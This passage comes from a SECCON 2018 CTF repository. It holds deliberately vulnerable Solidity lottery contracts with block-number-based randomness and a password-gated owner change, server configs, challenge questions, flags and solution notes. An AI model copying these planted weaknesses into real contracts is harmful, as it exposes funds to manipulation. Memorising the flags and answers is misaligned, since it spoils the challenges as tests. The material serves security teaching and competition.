 54 | 		"payable": false,
 55 | 		"stateMutability": "view",
 56 | 		"type": "function"
 57 | 	},
 58 | 	{
 59 | 		"constant": true,
 60 | 		"inputs": [],
 61 | 		"name": "player",
 62 | 		"outputs": [
 63 | 			{
 64 | 				"name": "",
 65 | 				"type": "address"
 66 | 			}
 67 | 		],
 68 | 		"payable": false,
 69 | 		"stateMutability": "view",
 70 | 		"type": "function"
 71 | 	},
 72 | 	{
 73 | 		"constant": true,
 74 | 		"inputs": [],
 75 | 		"name": "seed",
 76 | 		"outputs": [
 77 | 			{
 78 | 				"name": "",
 79 | 				"type": "uint256"
 80 | 			}
 81 | 		],
 82 | 		"payable": false,
 83 | 		"stateMutability": "view",
 84 | 		"type": "function"
 85 | 	},
 86 | 	{
 87 | 		"constant": true,
 88 | 		"inputs": [],
 89 | 		"name": "owner",
 90 | 		"outputs": [
 91 | 			{
 92 | 				"name": "",
 93 | 				"type": "address"
 94 | 			}
 95 | 		],
 96 | 		"payable": false,
 97 | 		"stateMutability": "view",
 98 | 		"type": "function"
 99 | 	},
100 | 	{
101 | 		"constant": true,
102 | 		"inputs": [],
103 | 		"name": "getItem",
104 | 		"outputs": [
105 | 			{
106 | 				"name": "",
107 | 				"type": "bool"
108 | 			}
109 | 		],
110 | 		"payable": false,
111 | 		"stateMutability": "view",
112 | 		"type": "function"
113 | 	},
114 | 	{
115 | 		"constant": false,
116 | 		"inputs": [
117 | 			{
118 | 				"name": "_password",
119 | 				"type": "bytes32"
120 | 			}
121 | 		],
122 | 		"name": "changeOwner",
123 | 		"outputs": [],
124 | 		"payable": false,
125 | 		"stateMutability": "nonpayable",
126 | 		"type": "function"
127 | 	},
128 | 	{
129 | 		"inputs": [
130 | 			{
131 | 				"name": "_password",
132 | 				"type": "bytes32"
133 | 			},
134 | 			{
135 | 				"name": "_seed",
136 | 				"type": "uint256"
137 | 			},
138 | 			{
139 | 				"name": "_player",
140 | 				"type": "address"
141 | 			}
142 | 		],
143 | 		"payable": false,
144 | 		"stateMutability": "nonpayable",
145 | 		"type": "constructor"
146 | 	}
147 | ]
148 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv1/Gacha-bytecode.txt:
--------------------------------------------------------------------------------
1 | 0x608060405260006002556000600560006101000a81548160ff02191690831515021790555034801561003057600080fd5b50604051606080610654833981018060405281019080805190602001909291908051906020019092919080519060200190929190505050336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508260068160001916905550600143034060019004600481905550816003819055505050506105398061011b6000396000f300608060405260043610610098576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680622a228c1461009d57806329e9e7d6146100ca5780632e4837ea146100f55780633fa218061461012457806348db5f891461014f5780637d94792a146101a65780638da5cb5b146101d1578063c412eaba14610228578063f086965e14610257575b600080fd5b3480156100a957600080fd5b506100c860048036038101908080359060200190929190505050610288565b005b3480156100d657600080fd5b506100df6102ed565b6040518082815260200191505060405180910390f35b34801561010157600080fd5b5061010a6102f3565b604051808215151515815260200191505060405180910390f35b34801561013057600080fd5b50610139610428565b6040518082815260200191505060405180910390f35b34801561015b57600080fd5b5061016461042e565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101b257600080fd5b506101bb610454565b6040518082815260200191505060405180910390f35b3480156101dd57600080fd5b506101e661045a565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561023457600080fd5b5061023d61047f565b604051808215151515815260200191505060405180910390f35b34801561026357600080fd5b506102866004803603810190808035600019169060200190929190505050610492565b005b3373ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415156102e357600080fd5b8060038190555050565b60025481565b60008060003373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614151561035457600080fd5b600143034060019004915081600454141561036e57600080fd5b816004819055506002600081548092919060010191905055506000610398600254620f42406104e8565b14156103d0576001600560006101000a81548160ff021916908315150217905550600560009054906101000a900460ff169250610423565b6103e1436003540262030d406104e8565b905080600381905550613039811415610410576001600560006101000a81548160ff0219169083151502179055505b600560009054906101000a900460ff1692505b505090565b60045481565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60035481565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600560009054906101000a900460ff1681565b80600019166006546000191614156104e557336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b60008082141515156104f957600080fd5b818381151561050457fe5b069050929150505600a165627a7a72305820f3bab01aec860a31b185a9d2bc4bf193ea1baae604d96c076206d138d21f85ff0029
2 | 
3 | 
4 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv1/Gacha.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | contract Gacha {
 4 |     address public owner;
 5 |     address public player;
 6 |     uint256 public played = 0;
 7 |     uint256 public seed;
 8 |     uint256 public lastHash;
 9 |     bool public getItem = false;
10 |     bytes32 private password;
11 |     
12 |     modifier onlyOwner() {
13 |         require(owner == msg.sender);
14 |         _;
15 |     }
16 |     
17 |     constructor(bytes32 _password, uint256 _seed, address _player) public {
18 |         owner = msg.sender;
19 |         player = _player;
20 |         password = _password;
21 |         lastHash = uint256(blockhash(block.number-1));
22 |         seed = _seed;
23 |     }
24 |     
25 |     function pickUp() public returns(bool) {
26 |         require(player == msg.sender);
27 |         
28 |         uint256 blockValue = uint256(blockhash(block.number-1));
29 |         if (lastHash == blockValue) {
30 |             revert();
31 |         }
32 |         lastHash = blockValue;
33 | 
34 |         played++;
35 |         if (mod(played, 1000000) == 0) {
36 |             getItem = true;    
37 |             return getItem;
38 |         }
39 |         
40 |         uint256 result = mod(seed * block.number, 200000);//変える
41 |         seed = result;
42 |         
43 |         if (result == 12345) getItem = true;
44 |         
45 |         return getItem;
46 |     }
47 |     
48 |     function mod(uint256 a, uint256 b) internal pure returns (uint256) {
49 |         require(b != 0);
50 |         return a % b;
51 |     }
52 |     
53 |     function initSeed(uint256 _seed) onlyOwner public {
54 |         seed = _seed;
55 |     }
56 |     
57 |     function changeOwner(bytes32 _password) public {
58 |         if (password == _password) owner = msg.sender;
59 |     }
60 |     
61 | }
62 | 
63 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv1/GachaFactory-abi.txt:
--------------------------------------------------------------------------------
1 | [{"constant":false,"inputs":[{"name":"_password","type":"bytes32"},{"name":"_seed","type":"uint256"},{"name":"_player","type":"address"}],"name":"generateContract","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_contract","type":"address"}],"name":"validateContract","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"_player","type":"address"}],"name":"referContractAddress","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_player","type":"address"},{"indexed":false,"name":"_contract","type":"address"}],"name":"Generate","type":"event"}]
2 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv1/GachaFactory.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | import "./Gacha.sol";
 4 | 
 5 | contract GachaFactory {
 6 |     address private owner;
 7 |     mapping(address => address) private userContract;//player address -> contract address
 8 |     
 9 |     modifier onlyOwner() {
10 |         require(owner == msg.sender);
11 |         _;
12 |     }
13 |     
14 |     event Generate(address _player, address _contract);
15 |     
16 |     constructor () public {
17 |         owner = msg.sender;
18 |     }
19 |     
20 |     function generateContract(bytes32 _password, uint256 _seed, address _player) onlyOwner public returns(address) {
21 |         Gacha gachaInstance = new Gacha(_password, _seed, _player);
22 |         userContract[_player] = address(gachaInstance);
23 |         emit Generate(_player, userContract[_player]);
24 |         return userContract[_player];
25 |     }
26 |     
27 |     function referContractAddress(address _player) onlyOwner public view returns(address) {
28 |         return userContract[_player];
29 |     }
30 |     
31 |     function validateContract(address _contract) onlyOwner public view returns(bool) {
32 |         Gacha gachaInstance = Gacha(_contract);
33 |         return gachaInstance.getItem();
34 |     }
35 | }


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv2/Gacha2.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | contract Gacha2 {
 4 |     address public owner;
 5 |     address public player;
 6 |     uint256 public played = 0;
 7 |     uint256 public seed;
 8 |     uint256 public lastHash;
 9 |     bool public getItem = false;
10 |     bytes32 private password;
11 |     
12 |     modifier onlyOwner() {
13 |         require(owner == msg.sender);
14 |         _;
15 |     }
16 |     
17 |     constructor(bytes32 _password, uint256 _seed, address _player) public {
18 |         owner = msg.sender;
19 |         player = _player;
20 |         password = _password;
21 |         lastHash = uint256(blockhash(block.number-1));
22 |         seed = _seed;
23 |     }
24 |     
25 |     function pickUp() public returns(bool) {
26 |         require(player == msg.sender);
27 |         
28 |         uint256 blockValue = uint256(blockhash(block.number-1));
29 |         if (lastHash == blockValue) {
30 |             revert();
31 |         }
32 |         lastHash = blockValue;
33 | 
34 |         played++;
35 |         if (mod(played, 1000000) == 0) {
36 |             getItem = true;    
37 |             return getItem;
38 |         }
39 |         
40 |         uint256 result = mod(seed * block.number, 200000);
41 |         seed = result;
42 |         
43 |         if (result == 12345) getItem = true;
44 |         
45 |         return getItem;
46 |     }
47 |     
48 |     function mod(uint256 a, uint256 b) internal pure returns (uint256) {
49 |         require(b != 0);
50 |         return a % b;
51 |     }
52 |     
53 |     function initSeed(uint256 _seed) onlyOwner public {
54 |         seed = _seed;
55 |     }
56 |     
57 |     function changeOwner(bytes _password) public returns(bool){
58 |         if (checkPassword(_password) == true) {
59 |             owner = msg.sender;
60 |         }
61 |             
62 |     }
63 |     
64 |     function checkPassword(bytes _password) public view returns(bool) {
65 |         if (password == keccak256(abi.encodePacked(_password))) {
66 |             return true;
67 |         }
68 |         else return false;
69 |     }
70 |     
71 | }
72 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv2/GachaFactory2.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | import "./Gacha2.sol";
 4 | 
 5 | contract GachaFactory2 {
 6 |     address private owner;
 7 |     mapping(address => address) private userContract;//player address -> contract address
 8 |     
 9 |     modifier onlyOwner() {
10 |         require(owner == msg.sender);
11 |         _;
12 |     }
13 |     
14 |     event Generate(address _player, address _contract);
15 |     
16 |     constructor () public {
17 |         owner = msg.sender;
18 |     }
19 |     
20 |     function generateContract(bytes32 _password, uint256 _seed, address _player) onlyOwner public returns(address) {
21 |         Gacha2 gachaInstance = new Gacha2(_password, _seed, _player);
22 |         userContract[_player] = address(gachaInstance);
23 |         emit Generate(_player, userContract[_player]);
24 |         return userContract[_player];
25 |     }
26 |     
27 |     function referContractAddress(address _player) onlyOwner public view returns(address) {
28 |         return userContract[_player];
29 |     }
30 |     
31 |     function validateContract(address _contract) onlyOwner public view returns(bool) {
32 |         Gacha2 gachaInstance = Gacha2(_contract);
33 |         return gachaInstance.getItem();
34 |     }
35 | 
36 | }
37 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/static-nodes.json:
--------------------------------------------------------------------------------
1 | [
2 |     "enode://a73916d5cb751a06c0cece71387389e809510ccc8c7c2bf93ebdd81d7b14898c8a0360d728494b5c79fbd78e9e6c95a19023b70163e3e202ce27658854e4ea41@172.16.83.172:30304?discport=0"
3 | ]
4 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python
 2 | RUN pip install flask gunicorn requests tinydb web3 pysha3 gevent
 3 | 
 4 | RUN apt-get update
 5 | RUN apt-get install -y dnsutils
 6 | 
 7 | RUN useradd webapp
 8 | USER webapp
 9 | ADD ./src/ /usr/src/webapp
10 | ENV HOME /usr/src/webapp
11 | WORKDIR /usr/src/webapp
12 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/.bash_history:
--------------------------------------------------------------------------------
 1 | python
 2 | ls
 3 | gunicorn app:app -b :8000 --name app --worker-connections 1000
 4 | gunicorn app:app -b :8000 --name app --worker-connections 1000
 5 | gunicorn app:app -b :8000 --name app -w 4
 6 | python 
 7 | ls
 8 | gunicorn app:app -b :8000 --name app -k gevent --worker-connections 1000
 9 | ls
10 | gunicorn app:app -b :8000 --name app -k gevent --worker-connections 1000
11 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/.python_history:
--------------------------------------------------------------------------------
 1 | import subprocess
 2 | from web3 import Web3,HTTPProvider,IPCProvider
 3 | def dig(domain):
 4 |     result = subprocess.run(['nslookup', domain], stdout=subprocess.PIPE)
 5 |     ip = str(result.stdout).split("\\n")[-3].split(" ")[1]
 6 |     return ip
 7 | etherverIP = dig("etherver")
 8 | url = 'http://' + etherverIP + ':8545'
 9 | web3 = Web3(HTTPProvider(url))
10 | web3.eth.blockNumber
11 | web3.admin.peers
12 | web3.eth.syncing
13 | import gavent
14 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/Gacha.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | contract Gacha {
 4 |     address public owner;
 5 |     address public player;
 6 |     uint256 public played = 0;
 7 |     uint256 public seed;
 8 |     uint256 public lastHash;
 9 |     bool public getItem = false;
10 |     bytes32 private password;
11 |     
12 |     modifier onlyOwner() {
13 |         require(owner == msg.sender);
14 |         _;
15 |     }
16 |     
17 |     constructor(bytes32 _password, uint256 _seed, address _player) public {
18 |         owner = msg.sender;
19 |         player = _player;
20 |         password = _password;
21 |         lastHash = uint256(blockhash(block.number-1));
22 |         seed = _seed;
23 |     }
24 |     
25 |     function pickUp() public returns(bool) {
26 |         require(player == msg.sender);
27 |         
28 |         uint256 blockValue = uint256(blockhash(block.number-1));
29 |         if (lastHash == blockValue) {
30 |             revert();
31 |         }
32 |         lastHash = blockValue;
33 | 
34 |         played++;
35 |         if (mod(played, 1000000) == 0) {
36 |             getItem = true;    
37 |             return getItem;
38 |         }
39 |         
40 |         uint256 result = mod(seed * block.number, 200000);
41 |         seed = result;
42 |         
43 |         if (result == 12345) getItem = true; // Flag is here!!
44 |         
45 |         return getItem;
46 |     }
47 |     
48 |     function mod(uint256 a, uint256 b) internal pure returns (uint256) {
49 |         require(b != 0);
50 |         return a % b;
51 |     }
52 |     
53 |     function initSeed(uint256 _seed) onlyOwner public {
54 |         seed = _seed;
55 |     }
56 |     
57 |     function changeOwner(bytes32 _password) public {
58 |         if (password == _password) owner = msg.sender;
59 |     }
60 |     
61 | }
62 | 
63 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/Gacha2.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity^0.4.24;
 2 | 
 3 | contract Gacha2 {
 4 |     address public owner;
 5 |     address public player;
 6 |     uint256 public played = 0;
 7 |     uint256 public seed;
 8 |     uint256 public lastHash;
 9 |     bool public getItem = false;
10 |     bytes32 private password;
11 |     
12 |     modifier onlyOwner() {
13 |         require(owner == msg.sender);
14 |         _;
15 |     }
16 |     
17 |     constructor(bytes32 _password, uint256 _seed, address _player) public {
18 |         owner = msg.sender;
19 |         player = _player;
20 |         password = _password;
21 |         lastHash = uint256(blockhash(block.number-1));
22 |         seed = _seed;
23 |     }
24 |     
25 |     function pickUp() public returns(bool) {
26 |         require(player == msg.sender);
27 |         
28 |         uint256 blockValue = uint256(blockhash(block.number-1));
29 |         if (lastHash == blockValue) {
30 |             revert();
31 |         }
32 |         lastHash = blockValue;
33 | 
34 |         played++;
35 |         if (mod(played, 1000000) == 0) {
36 |             getItem = true;    
37 |             return getItem;
38 |         }
39 |         
40 |         uint256 result = mod(seed * block.number, 200000);
41 |         seed = result;
42 |         
43 |         if (result == 12345) getItem = true; // Flag is here!!
44 |         
45 |         return getItem;
46 |     }
47 |     
48 |     function mod(uint256 a, uint256 b) internal pure returns (uint256) {
49 |         require(b != 0);
50 |         return a % b;
51 |     }
52 |     
53 |     function initSeed(uint256 _seed) onlyOwner public {
54 |         seed = _seed;
55 |     }
56 |     
57 |     function changeOwner(bytes _password) public returns(bool){
58 |         if (checkPassword(_password) == true) {
59 |             owner = msg.sender;
60 |         }
61 |             
62 |     }
63 |     
64 |     function checkPassword(bytes _password) public view returns(bool) {
65 |         if (password == keccak256(abi.encodePacked(_password))) {
66 |             return true;
67 |         }
68 |         else return false;
69 |     }
70 |     
71 | }
72 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/__pycache__/app.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/ether/build/server/flask/src/__pycache__/app.cpython-37.pyc


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/shell.py:
--------------------------------------------------------------------------------
 1 | import subprocess
 2 | from web3 import Web3,HTTPProvider,IPCProvider
 3 | def dig(domain):
 4 |     result = subprocess.run(['nslookup', domain], stdout=subprocess.PIPE)
 5 |     ip = str(result.stdout).split("\\n")[-3].split(" ")[1]
 6 |     return ip
 7 | 
 8 | etherverIP = dig("etherver")
 9 | url = 'http://' + etherverIP + ':8545'
10 | web3 = Web3(HTTPProvider(url))
11 | 
12 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/static/circle.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/ether/build/server/flask/src/static/circle.gif


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/static/lottery.js:
--------------------------------------------------------------------------------
 1 | function showLoader(loader, table)
 2 | {
 3 |     loader.show();
 4 |     table.hide();
 5 |     return true;
 6 | }
 7 | 
 8 | function hideLoader(loader, table)
 9 | {
10 |     loader.hide();
11 |     table.show();
12 |     return false;
13 | }
14 | 
15 | function claimETH()
16 | {
17 |     $("#claimETH").prop("disabled", true);
18 |     loaderShownFlags[0] = showLoader($("#info_loader"), $("#info_table"));
19 |     $.get( "/api/claimETH", function( data ) {
20 | 	getBalance();
21 |     });
22 | }
23 | 
24 | function getBalance()
25 | {
26 |     loaderShownFlags[0] = showLoader($("#info_loader"), $("#info_table"));
27 |     $.get( "/api/getBalance", function( data ) {
28 | 	document.getElementById("balance").innerHTML = data;
29 | 	loaderShownFlags[0] = hideLoader($("#info_loader"), $("#info_table"));
30 |     });
31 | }
32 | 
33 | // ---
34 | 
35 | function deploy(level)
36 | {
37 |     let target = "lv" + String(level);
38 |     let loader = $("#" + target + "_loader");
39 |     let table = $("#" + target + "_table");
40 |     $("#" + target + "_deploy").prop("disabled", true);
41 |     $("#" + target).show();
42 |     loaderShownFlags[level] = showLoader(loader, table);
43 |     $.get( "/api/deploy/" + String(level), function( data ) {
44 | 	getData(level);
45 |     });
46 | }
47 | 
48 | function getData(level)
49 | {
50 |     let target = "lv" + String(level);
51 |     let loader = $("#" + target + "_loader");
52 |     let table = $("#" + target + "_table");
53 |     if($("#" + target).is(":visible")){
54 | 	$.get( "/api/getData/" + String(level), function( data ) {
55 | 	    let json = JSON.parse(data);
56 | 	    if(json["contractAddr"]!==null){
57 | 		document.getElementById(target + "_contractAddr").innerHTML = json["contractAddr"];
58 | 		document.getElementById(target + "_flag").innerHTML = json["flag"];
59 | 		document.getElementById(target + "_played").innerHTML = json["played"];
60 | 		loaderShownFlags[level] = hideLoader(loader, table);
61 | 	    }
62 | 	});
63 |     }
64 | }
65 | 
66 | // ---
67 | 
68 | function testLuck(level)
69 | {
70 |     let target = "lv" + String(level);
71 |     let loader = $("#" + target + "_loader");
72 |     let table = $("#" + target + "_table");
73 |     $("#" + target).show();
74 |     loaderShownFlags[level] = showLoader(loader, table);
75 |     $.get( "/api/testLuck/" + String(level), function( data ) {
76 | 	getData(level);
77 | 	getBalance();
78 | 	loaderShownFlags[level] = hideLoader(loader, table);
79 |     });
80 | }
81 | 
82 | // ---
83 | 
84 | var loaderShownFlags = new Array(true, true, true);
85 | 
86 | $(document).ready(function(){
87 |     $('[data-toggle="popover"]').popover({html: true});
88 | });
89 | 
90 | getBalance();
91 | 
92 | for(let level=1; level<=2; level++){
93 |     getData(level);
94 | }
95 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/flask/src/static/style.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/ether/build/server/flask/src/static/style.css


--------------------------------------------------------------------------------
/Crypto/ether/build/server/nginx/conf.d/webapp.conf:
--------------------------------------------------------------------------------
 1 | limit_req_zone $binary_remote_addr zone=mylimit:10m rate=120r/m;
 2 | 
 3 | server {
 4 |     listen 80;
 5 |     charset utf-8;
 6 |     access_log off;
 7 | 
 8 |     client_max_body_size 5M;
 9 | 
10 |     location / {
11 |         #limit_req zone=mylimit;
12 | 
13 | 	proxy_buffering off;
14 |         proxy_pass http://flask:8000;
15 |         proxy_set_header Host $host:$server_port;
16 |         proxy_set_header X-Forwarded-Host $server_name;
17 |         proxy_set_header X-Real-IP $remote_addr;
18 |         proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
19 |     }
20 | 
21 |     location ~ ^/show/ {
22 |     	allow 127.0.0.1;
23 |         deny all;
24 |     }
25 | 
26 | #    location /static {
27 | #        access_log   off;
28 | #        expires      30d;
29 | #        alias /app/static;
30 | #    }
31 | }
32 | 
33 | 


--------------------------------------------------------------------------------
/Crypto/ether/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{CreateRandomInBlockchainIsDifficult}
2 | 


--------------------------------------------------------------------------------
/Crypto/ether/question.txt:
--------------------------------------------------------------------------------
1 | Smart Gacha Lv.1
2 | 
3 | Toggle the "getItem" boolean value in "fair lottery contract" to true.
4 | If you are lucky, you have only to press "test luck" button once.
5 | Even if you are not lucky, all you have to do is press the button 1,000,000 times.
6 | 
7 | Server:http://ether.pwn.seccon.jp/
8 | 


--------------------------------------------------------------------------------
/Crypto/ether2/answer.txt:
--------------------------------------------------------------------------------
1 | you will get a hash value in the same way as question1, but in order to change owner address, you have to know original value of the hash.
2 | If you take a closer look at the hash value, you will find that the value includes its contract address.
3 | Contract address is computed as 
4 | "sha3(rlp.encode(['transaction sender address', 'transaction sender nonce']))[12:]"
5 | 


--------------------------------------------------------------------------------
/Crypto/ether2/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{EthereumUseHashInManyPlaces}
2 | 


--------------------------------------------------------------------------------
/Crypto/ether2/question.txt:
--------------------------------------------------------------------------------
1 | Smart Gacha Lv.2
2 | 
3 | We don't want to think that you cheated, but we enhance security of the contract.
4 | OK, press "test luck" button to check your luck!
5 | 
6 | Server:http://ether.pwn.seccon.jp/
7 | 


--------------------------------------------------------------------------------
/Crypto/mnemonic/answer.js:
--------------------------------------------------------------------------------
 1 | let bip39 = require('bip39');
 2 | let crypto = require('crypto');
 3 | let wordlist_jp = bip39.wordlists["japanese"];
 4 | let question = '???　とかす　なおす　よけい　ちいさい　さんらん　けむり　ていど　かがく　とかす　そあく　きあい　ぶどう　こうどう　ねみみ　にあう　ねんぐ　ひねる　おまいり　いちじ　ぎゅうにく　みりょく　ろしゅつ　あつめる';
 5 | 
 6 | let questionArr = question.split("　");
 7 | let arr = [];
 8 | for (let i=0; i < wordlist_jp.length; i++){
 9 |     questionArr[0] = wordlist_jp[i];
10 |     let mnemonic = questionArr.join(' ');
11 |     if (bip39.validateMnemonic(mnemonic, wordlist_jp)){
12 | 	let entropy = bip39.mnemonicToEntropy(mnemonic, wordlist_jp)
13 | 	if("c0f" == entropy.slice(0,3)){
14 | 	    md5 = crypto.createHash('md5');
15 | 	    console.log("SECCON{"+md5.update(entropy, 'binary').digest('hex')+"}");
16 | 	}
17 |     }
18 | }
19 | 


--------------------------------------------------------------------------------
/Crypto/mnemonic/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{cda2cb1742d1b6fc21d05c879c263eec}
2 | 


--------------------------------------------------------------------------------
/Crypto/mnemonic/question.txt:
--------------------------------------------------------------------------------
 1 | {
 2 |     "japanese": [
 3 | 	[
 4 | 	    "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc",
 5 | 	    "ふじみ　あさひ　みのう　いっち　いがく　とない　はづき　ますく　いせえび　たれんと　おとしもの　おどろかす　ことし　おくりがな　ちょうし　ちきゅう　さんきゃく　こんとん　せつだん　ちしき　ぬいくぎ　まんなか　たんい　そっと",
 6 | 	    "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f"
 7 | 	],
 8 | 	[
 9 | 	    "dfc9708ac4b4e7f67be6b8e33486482cb363e81967a1569c6fd888b088046f7c",
10 | 	    "ほんやく　ごうきゅう　おさめる　たこやき　ごかん　れいぎ　やせる　ふるい　まんなか　てんない　だんろ　さうな　きぼう　よくぼう　しのぐ　よけい　こんき　みうち　らくご　いわかん　いこく　あたためる　のはら　たぶん",
11 | 	    "bdadda5bbff97eb4fda0f11c7141bc3ce3de0fef0b2e4c47900858cec639c10187aee4695b1ba462b1dd34b170b62801e68c270b93af62629f4964947a620ed9"
12 | 	],
13 | 	[
14 | 	    "c0f...",
15 | 	    "???　とかす　なおす　よけい　ちいさい　さんらん　けむり　ていど　かがく　とかす　そあく　きあい　ぶどう　こうどう　ねみみ　にあう　ねんぐ　ひねる　おまいり　いちじ　ぎゅうにく　みりょく　ろしゅつ　あつめる",
16 | 	    "e9a..."
17 | 	],
18 |     ],
19 |     "flag": "SECCON{md5(c0f...)}"
20 | }
21 | 


--------------------------------------------------------------------------------
/Forensics/History/answer.txt:
--------------------------------------------------------------------------------
 1 | Overview:
 2 | 
 3 | Analyze the USN journal recorded in the Windows OS, follow the changed history of the file name,
 4 | Connecting the changed file name becomes a flag.
 5 | 
 6 | 
 7 | Contents:
 8 | 1 "J" file which unzipped the "J. zip" file of the problem is analyzed with usn_analytics etc.
 9 | Usn_analytics: http://www.kazamiya.net/usn_analytics
10 | 2 Among the formatted USN journals, Reason is set as CREATE (file creation) and NEWNAME (file name change)
11 | 3 If the FileID is the same FileID, since it is the same file, we will look at FileName paying attention to FileID
12 | 4 File ID 60666 shows that SEC.txt is created at 2018/9/29 16: 54: 38
13 | 5 Continue, with the same FileID 60666, CON {.txt, F0r.txt, ensic.txt, s.txt, _usnjrnl.txt, 2018} .txt
14 | You can see that the file name has been changed
15 | 6 Connecting the changed file names will result in SECCON {F0rensics_usnjrnl2018}
16 | 
17 | Other:
18 | J. zip is only for reducing the file size.
19 | 
20 | 
21 | 
22 | -----------
23 | 
24 | ●概要
25 | 　Windows OSで記録されるUSNジャーナルを解析し、ファイル名の変更された履歴を追い、
26 | 変更されたファイル名をつなぐとフラグとなる。
27 | 
28 | ●内容
29 | 　１　問題の「J.zip」ファイルを解凍した「J」ファイルをusn_analytics等で解析
30 | 　　　usn_analytics: http://www.kazamiya.net/usn_analytics
31 | 
32 | 　２　整形したUSNジャーナルのうち、ReasonをCREATE（ファイルの作成）とNEWNAME（ファイル名の変更）
33 | 　３　FileIDが同じFileIDであれば、同じファイルであるため、FileIDに着目しながらFileNameを見ていく
34 | 　４　FileID 60666で、2018/9/29  16:54:38にSEC.txtが作成されているのがわかる
35 | 　５　続けて、同じFileID 60666で、CON{.txt、F0r.txt、ensic.txt、s.txt、_usnjrnl.txt、2018}.txt
36 | 　　　とファイル名が変更されているのがわかる
37 | 　６　変更されたファイル名をつなぐと、SECCON{F0rensics_usnjrnl2018}となる
38 | 
39 | ●その他
40 | 　J.zipにしているのは、ファイルサイズを小さくするためだけです。


--------------------------------------------------------------------------------
/Forensics/History/build/J:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Forensics/History/build/J


--------------------------------------------------------------------------------
/Forensics/History/files/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Forensics/History/files/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba


--------------------------------------------------------------------------------
/Forensics/History/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{F0rensics_usnjrnl2018}


--------------------------------------------------------------------------------
/Forensics/History/question.txt:
--------------------------------------------------------------------------------
1 | History
2 | Check changed filename.
3 | file:J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba
4 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/answer.txt:
--------------------------------------------------------------------------------
 1 | -- makefile.sh
 2 | echo 'SECCON{'`cat key`'}' > flag.txt
 3 | zip -e --password=`perl -e "print time()"` flag.zip flag.txt
 4 | --
 5 | 
 6 | players have to unzip the zipped flag.zip with password.
